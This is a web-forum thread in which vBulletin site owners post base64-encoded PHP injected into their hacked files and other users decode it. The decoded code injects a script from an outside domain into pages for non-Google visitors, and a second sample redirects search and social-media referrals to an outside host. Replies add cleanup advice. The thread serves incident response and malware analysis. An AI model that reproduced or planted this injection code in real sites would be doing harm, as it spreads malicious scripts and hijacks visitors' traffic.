Site hacked - decode base64 please

Collapse
X
Collapse
 
  • Page of 1
  • Time
  • Show
Clear All
new posts
Previous template Next
  • Raptor
    Senior Member
    • Jan 2001
    • 224
    • 4.2.x
    #1

    Site hacked - decode base64 please

    Found out this morning that every single PHP file on our server was changed to include base64 encode at the beginning of the file.

    Can someone decode for me please

    Code:
    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZSIpKXsgcmV0dXJuIGJhc2U2NF9kZWNvZGUoIlBITmpjbWx3ZENCemNtTTlJbWgwZEhBNkx5OXpkMlZsY0hOMFlXdGxjMkZ1WkdOdmJuUmxjM1J6YVc1bWJ5NWpiMjB2YW5NdWNHaHdQM005TVNJK1BDOXpZM0pwY0hRKyIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKTsgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PTEwOyAgICAgICRSQTNENTJFNTJBNDg5MzZDREUwRjUzNTZCQjA4NjUyRjI9MDsgICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjQpeyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPUB1bnBhY2soJ3YnLHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDEwLDIpKTsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj0kUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCWzFdOyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yKyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmOCl7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjE2KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTI7ICAgICAgfSAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9QGd6aW5mbGF0ZShAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkpOyAgICAgIGlmKCRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9PT1GQUxTRSl7ICAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9JFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QzsgICAgICB9ICAgICAgcmV0dXJuICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM7ICAgICB9ICAgIH0gICAgZnVuY3Rpb24gbXJvYmgoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qil7ICAgICBIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTsgICAgICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREU9Z3pkZWNvZGUoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qik7ICAgICAgIGlmKHByZWdfbWF0Y2goJy9cPFwvYm9keS9zaScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSkpeyAgICAgIHJldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxcL2JvZHlbXlw+XSpcPikvc2knLGdtbCgpLiJcbiIuJyQxJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKTsgICAgIH1lbHNleyAgICAgIHJldHVybiAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFLmdtbCgpOyAgICAgfSAgICB9ICAgIG9iX3N0YXJ0KCdtcm9iaCcpOyAgIH0gIH0="));?>
    Digital-Forums: www.digital-forums.com | CK3 Games: www.ck3.co.uk
    Tags: None
    • mentalrz
      Senior Member
      • Sep 2004
      • 538
      • 1.1.x
      #2
      Code:
      if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){   $GLOBALS['mr_no']=1;   if(!function_exists('mrobh')){      if(!function_exists('gml')){     function gml(){      if (!stristr($_SERVER["HTTP_USER_AGENT"],"google")){ return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9zd2VlcHN0YWtlc2FuZGNvbnRlc3RzaW5mby5jb20vanMucGhwP3M9MSI+PC9zY3JpcHQ+");      }      return "";     }    }        if(!function_exists('gzdecode')){     function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){      $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));      $RBE4C4D037E939226F65812885A53DAD9=10;      $RA3D52E52A48936CDE0F5356BB08652F2=0;      if($R30B2AB8DC1496D06B230A71D8962AF5D&4){       $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));       $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];       $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&8){       $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&16){       $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&2){       $RBE4C4D037E939226F65812885A53DAD9+=2;      }      $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));      if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){       $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;      }      return $R034AE2AB94F99CC81B389A1822DA3353;     }    }    function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){     Header('Content-Encoding: none');     $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);       if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){      return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);     }else{      return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();     }    }    ob_start('mrobh');   }  }
      here.

      #edit

      more inside
      Code:
      <script src="http://sweepstakesandcontestsinfo.com/js.php?s=1"></script>

        Comment

        • Raptor
          Senior Member
          • Jan 2001
          • 224
          • 4.2.x
          #3
          Thanks. All fixed now - now tracking down how, what, who, where, why
          Digital-Forums: www.digital-forums.com | CK3 Games: www.ck3.co.uk

            Comment

            • alemcherry
              Senior Member
              • Jun 2006
              • 415
              #4
              You can check your FTP log and see the IPs that modified the files. However, that is meaningless, the IPs could be from any part of the world and would most probably be a hacked system itself.

              In most cases, your FTP password is stolen from your system itself, either monitoring the key strokes or directly from saved password from your FTP client. Make sure that you clean your (and anyone else who has access to your login) system with more than one anti-virus/rootkit scanner etc. 90% of such hacking is caused by trojens getting access to your passwords. Clean up your system and change all passwords.
              Hosting Coupons: Hostmonster @ $3.95 and 20% off Mediatemple

                Comment

                • AlexanderT
                  Senior Member
                  • Mar 2003
                  • 992
                  #5
                  Seems like the same hack that affected thousands of Godaddy hosts earlier this year:

                  Page not found | Sucuri
                  http://sucuri.net/new-malware-sweepstakesandcontestsnow-com.html

                    Comment

                    • mrdebian
                      New Member
                      • Aug 2009
                      • 3
                      #6
                      Hi,

                      Would you please let me know how I can decode the following as well. They hack most of the vb files even though vb is on the latest release with no security issues on plugins etc.

                      Code:
                      <?php eval(base64_decode("DQpldmFsKGJhc2U2NF9kZWNvZGUoIlpYWmhiQ2huZW5WdVkyOXRjSEpsYzNNb1ltRnpaVFkwWDJSbFkyOWtaU2duWlU1d1ZHTm1abmhrTTB3d1ExazFWMm93TDB4cVJtVlFkRmhWYzB0cmNYTXhSa0pRVEZOeVMwdzBjRmhXT1VKVVREQnZkSGxET0hGNVkzaE1WamxrVW5vd2FFNVVSV3QwUzJkaFRFWTBUMGt4VEhkVGIwaENlRU5XYUdoYWJrWktSVnBuU0ZwSlJVVlpSSGRSUnpGclQybFJXRmRDSzFOQ1JGbFRjV2hNUW1oTmFVSXhUVVp0UXl0c1NIUlNaRVZJWTFOR1EzQkJSR2wwTDFRME0wMVRVelZCZVc5RlZFSkNSVUZYVlVGQ2MwZHNjMVIwUTJkNVpsRXhaMUZrTmtNMVJVSktPRFp3Y2xkQlMwOUZZbUZSUFNjcEtTazdJRDgrUEQ4Z1pYWmhiQ2huZW5WdVkyOXRjSEpsYzNNb1ltRnpaVFkwWDJSbFkyOWtaU2duWlU1dk1XdE9NVXRCZWtWUmFGWXJiRXhKZERCU1ZHSXpUR0ZXTkRONlkzZEpjRTR3VG1oMFRWcHJTaXN4UlZZNFpIbG1ZVmh2VkhwaldrbDZZemhxVTNsR1lsQjBSblk0Wm5aVVZEbDNhVzQxTlhob01uYzRZbkpOZWtRd01rRTRUMXBGVFRCUlZFMVJielZrT1RSUUwzZE9iSGxHU1ZSRmRWbHhVMlI0UmtWUU9VWkJjVW93VFhWclducGliMHRzZEdvMmFFcGhXbUo2VUdjMmFEQXlaMlYwY0dGRWFtUmlZbFZDV0M5T1NWTXdNemxqUlV4S1pEbFlheTlRTlRSdUwxSkRlVkJ4Yml0NmFrYzNaMGh5S3prMVZrMHdUMk5ETDFOd2RVcFpSemt4TVhORlJHWlFOM1pUTTJaT01XMTNTelJ3Tm10eGVtOW9Vek13ZW5wcWN6RnNjbFJSWVcxVlptTlJiSFZ5VlVoc1FuZHdhakZTVEhoNlkwUlNTbWxNYVc1NlJsVktWSFp3WldVd2NHMUZObHB4ZDNRd01qWkZiRGxITDBodU9TdEJZVmx6WlVKTlBTY3BLU2s3SUQ4K1BEOGdaWFpoYkNobmVuVnVZMjl0Y0hKbGMzTW9ZbUZ6WlRZMFgyUmxZMjlrWlNnblpVNXdPVEF3UlV4bmFrRlZkMUJIZGxWcFF6UlJVV1ptZWtSTGEyYzRSM0ZSTVZGek5ubEthbXg0U3poR1JXaENSVWczTTNSdVZqVjBZVEpVZVZCMmVHUklPREJYYlRFeWFUTktlbkZIVUZaMFEzRlhaRk5LU21RemRHTjZlVk5vZEVscE5uVXdjbTB3WVRoQ1UxZHFVazV0VW04MUwxSnNUR3BEVURGSlIweEZlR1l4ZFhGeU1sTjJRV3hHTVhoSmRUUlFPVVJKTHpaU2NGVnlkbkV5YXpKbFRUaG5SV3hwWkRRMllURnlla2h5VW5NMFNrVlZSUzlIVTAxRFVFOVVSRXBJVlZSNVlVbHFVREZyYVd0cWJVcDZhMmxGZWl0YVNWUk1NVVV3YVZGNVVVMUhhMHByUmtSQk5FMW5ZMHgzYkZScVVVZElVbXROTWxvd1drc3dabHBTSzFVdmExVTBUa0ZTUzBFd05FNW5aR0ZCV1RSUGRWUldMekpaTTFWalRHYzBNblZaYzFsVVp6WTFWMlZaWVN0S2VGQXhlVFIxZWk5aGRTODBOaXMzT1RsSlZWQmphU2NwS1NrNyIpKTsNCg=="));

                        Comment

                        • BirdOPrey5
                          Senior Member
                          • Jul 2008
                          • 9613
                          • 5.6.3
                          #7
                          Online decoder here
                          http://www.base64decode.org

                            Comment

                            • BirdOPrey5
                              Senior Member
                              • Jul 2008
                              • 9613
                              • 5.6.3
                              #8
                              Actually decoding reviews its been encoded multiple times with various things, this site will do much better for you - http://www.unphp.net

                              Using a combo of both sites i get-

                              PHP Code:
                              function fi($i){$a=Array("yahoo","bing","rambler","gogo","live.com","aport","nigma","webalta","begun.ru","stumbleupon.com","bit.ly","tinyurl.com","/yandex\.ru\/yandsearch\?(.*?)\&lr\=/","/google\.(.*?)\/url\?sa/","myspace.com","facebook.com","aol.com","cache","inurl","Location: http://primefmgh.com/components/com_banners/models/index.php");return $a[$i];}$GLOBALS['_fi_'][0](round(0));$rt_0=$GLOBALS['_fi_'][1]();if(!$rt_0){$rt_1=$_SERVER[HTTP_REFERER];$rt_2=$_SERVER[HTTP_USER_AGENT];if($GLOBALS['_fi_'][2]($rt_1,fi(0))or $GLOBALS['_fi_'][3]($rt_1,fi(1))or $GLOBALS['_fi_'][4]($rt_1,fi(2))or $GLOBALS['_fi_'][5]($rt_1,fi(3))or $GLOBALS['_fi_'][6]($rt_1,fi(4))or $GLOBALS['_fi_'][7]($rt_1,fi(5))or $GLOBALS['_fi_'][8]($rt_1,fi(6))or $GLOBALS['_fi_'][9]($rt_1,fi(7))or $GLOBALS['_fi_'][10]($rt_1,fi(8))or $GLOBALS['_fi_'][11]($rt_1,fi(9))or $GLOBALS['_fi_'][12]($rt_1,fi(10))or $GLOBALS['_fi_'][13]($rt_1,fi(11))or $GLOBALS['_fi_'][14](fi(12),$rt_1)or $GLOBALS['_fi_'][15](fi(13),$rt_1)or $GLOBALS['_fi_'][16]($rt_1,fi(14))or $GLOBALS['_fi_'][17]($rt_1,fi(15))or $GLOBALS['_fi_'][18]($rt_1,fi(16))){if(!$GLOBALS['_fi_'][19]($rt_1,fi(17))or!$GLOBALS['_fi_'][20]($rt_1,fi(18))){$GLOBALS['_fi_'][21](fi(19));exit();}}}











                              //.end 
                              Last edited by BirdOPrey5; Thu 19 Dec '13, 4:58am.

                                Comment

                                • TheLastSuperman
                                  Senior Member
                                  • Sep 2008
                                  • 1799
                                  #9
                                  Originally posted by Raptor
                                  Found out this morning that every single PHP file on our server was changed to include base64 encode at the beginning of the file.

                                  Can someone decode for me please

                                  Code:
                                  <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZSIpKXsgcmV0dXJuIGJhc2U2NF9kZWNvZGUoIlBITmpjbWx3ZENCemNtTTlJbWgwZEhBNkx5OXpkMlZsY0hOMFlXdGxjMkZ1WkdOdmJuUmxjM1J6YVc1bWJ5NWpiMjB2YW5NdWNHaHdQM005TVNJK1BDOXpZM0pwY0hRKyIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKTsgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PTEwOyAgICAgICRSQTNENTJFNTJBNDg5MzZDREUwRjUzNTZCQjA4NjUyRjI9MDsgICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjQpeyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPUB1bnBhY2soJ3YnLHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDEwLDIpKTsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj0kUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCWzFdOyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yKyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmOCl7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjE2KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTI7ICAgICAgfSAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9QGd6aW5mbGF0ZShAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkpOyAgICAgIGlmKCRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9PT1GQUxTRSl7ICAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9JFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QzsgICAgICB9ICAgICAgcmV0dXJuICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM7ICAgICB9ICAgIH0gICAgZnVuY3Rpb24gbXJvYmgoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qil7ICAgICBIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTsgICAgICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREU9Z3pkZWNvZGUoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qik7ICAgICAgIGlmKHByZWdfbWF0Y2goJy9cPFwvYm9keS9zaScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSkpeyAgICAgIHJldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxcL2JvZHlbXlw+XSpcPikvc2knLGdtbCgpLiJcbiIuJyQxJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKTsgICAgIH1lbHNleyAgICAgIHJldHVybiAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFLmdtbCgpOyAgICAgfSAgICB9ICAgIG9iX3N0YXJ0KCdtcm9iaCcpOyAgIH0gIH0="));?>


                                  Please see my post here: http://www.vbulletin.com/forum/forum...31#post4012531
                                  Last edited by TheLastSuperman; Thu 19 Dec '13, 10:31pm.

                                  Former vBulletin Support Staff
                                  Hacked recently? See my blog post "Recovering a Hacked vBulletin Site".
                                  Thinking outside the box? Need modification support? Visit www.vBulletin.org and have at it!

                                    Comment

                                    Previous template Next
                                    widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                                    Working...